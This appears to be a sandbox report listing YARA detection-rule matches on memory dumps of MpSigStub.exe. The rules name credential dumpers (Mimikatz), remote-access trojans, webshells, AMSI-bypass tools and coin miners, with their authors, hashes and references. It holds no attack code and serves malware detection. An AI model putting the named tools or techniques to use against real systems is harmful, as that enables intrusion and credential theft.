Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: gh0st author = https://github.com/jackcr/
Source: 38.3.MpSigStub.exe.138be22418a.58.unpack, type: UNPACKEDPE	Matched rule: NetWiredRC_B date = 2014-12-23, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = NetWiredRC, version = 1.1
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_SharPyShell date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/antonioCoco/SharPyShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_DotNetInject date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/dtrizna/DotNetInject, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_ibombshell date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/Telefonica/ibombshell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: gh0st author = https://github.com/jackcr/
Source: 38.3.MpSigStub.exe.138be22418a.26.unpack, type: UNPACKEDPE	Matched rule: NetWiredRC_B date = 2014-12-23, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = NetWiredRC, version = 1.1
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: APT_PupyRAT_PY date = 2017-02-17, hash1 = 8d89f53b0a6558d6bb9cdbc9f218ef699f3c87dd06bc03dd042290dedc18cb71, author = Florian Roth, description = Detects Pupy RAT, reference = https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: SUSP_PDB_Path_Keywords date = 2019-10-04, author = Florian Roth, description = Detects suspicious PDB paths, reference = https://twitter.com/stvemillertime/status/1179832666285326337?s=20
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: MAL_AirdViper_Sample_Apr18_1 date = 2018-05-04, hash1 = 9f453f1d5088bd17c60e812289b4bb0a734b7ad2ba5a536f5fd6d6ac3b8f3397, author = Florian Roth, description = Detects Arid Viper malware sample, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: HKTL_NET_NAME_AmsiBypass date = 2021-01-22, author = Arnim Rupp, description = Detects .NET red/black-team tools via name, reference = https://github.com/0xB455/AmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 8fa4ba512b34a898c4564a8eac254b6a786d195b
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: TA17_293A_malware_1 date = 2017/07/17, hash5 = 038A97B4E2F37F34B255F0643E49FC9D, hash4 = 04738CA02F59A5CD394998A99FCD9613, hash3 = 8943E71A8C73B5E343AA9D2E19002373, hash2 = BA756DD64C1147515BA2298B6A760260, hash1 = A07AA521E7CAFB360294E56969EDA5D6, hash0 = 61C909D2F625223DB2FB858BBDF42A76, author = US-CERT Code Analysis Team (modified by Florian Roth), description = inveigh pen testing tools & related artifacts, hash10 = 4595DBE00A538DF127E0079294C87DA0, hash9 = 722154A36F32BA10E98020A8AD758A7A, hash8 = 5DBEF7BDDAF50624E840CCBCE2816594, hash7 = AA905A3508D9309A93AD5C0EC26EBC9B, hash6 = 65A1A73253F04354886F375B59550B46, reference = https://www.us-cert.gov/ncas/alerts/TA17-293A
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: ROKRAT_Nov17_1 date = 2017-11-28, author = Florian Roth, description = Detects ROKRAT malware, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 38.3.MpSigStub.exe.138be4ca38f.133.unpack, type: UNPACKEDPE	Matched rule: PoisonIvy_3 filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, cape_type = PoisonIvy Payload, ref = http://malwareconfig.com/stats/PoisonIvy
Source: 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18343624782.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp, type: MEMORY	Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Pupy_Backdoor date = 2017-08-11, hash5 = 06bb41c12644ca1761bcb3c14767180b673cb9d9116b555680073509e7063c3e, hash4 = 20e19817f72e72f87c794843d46c55f2b8fd091582bceca0460c9f0640c7bbd8, hash3 = 90757c1ae9597bea39bb52a38fb3d497358a2499c92c7636d71b95ec973186cc, hash2 = 83380f351214c3bd2c8e62430f70f8f90d11c831695027f329af04806b9f8ea4, hash1 = ae93714203c7ab4ab73f2ad8364819d16644c7649ea04f483b46924bd5bc0153, author = Florian Roth, description = Detects Pupy backdoor, hash7 = 8784c317e6977b4c201393913e76fc11ec34ea657de24e957d130ce9006caa01, hash6 = be83c513b24468558dc7df7f63d979af41287e568808ed8f807706f6992bfab2, reference = https://github.com/n1nj4sec/pupy-binaries, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000026.00000003.18293544646.00000138BD8C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000026.00000003.18347059262.00000138BDD2C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000026.00000003.18346820069.00000138BE12C000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_asp_generic date = 2021/03/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75
Source: 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp, type: MEMORY	Matched rule: xtremrat date = 2012-07-12, filetype = memory, author = Jean-Philippe Teissier / @Jipe_, description = Xtrem RAT v3.5, version = 1.0
Source: 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, type: MEMORY	Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp, type: MEMORY	Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp, type: MEMORY	Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
